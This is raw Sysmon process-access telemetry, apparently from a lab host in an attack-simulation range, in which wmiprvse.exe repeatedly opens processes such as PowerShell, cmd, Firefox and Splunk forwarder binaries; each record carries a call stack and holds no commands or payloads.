10341000x80000000000000001697712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 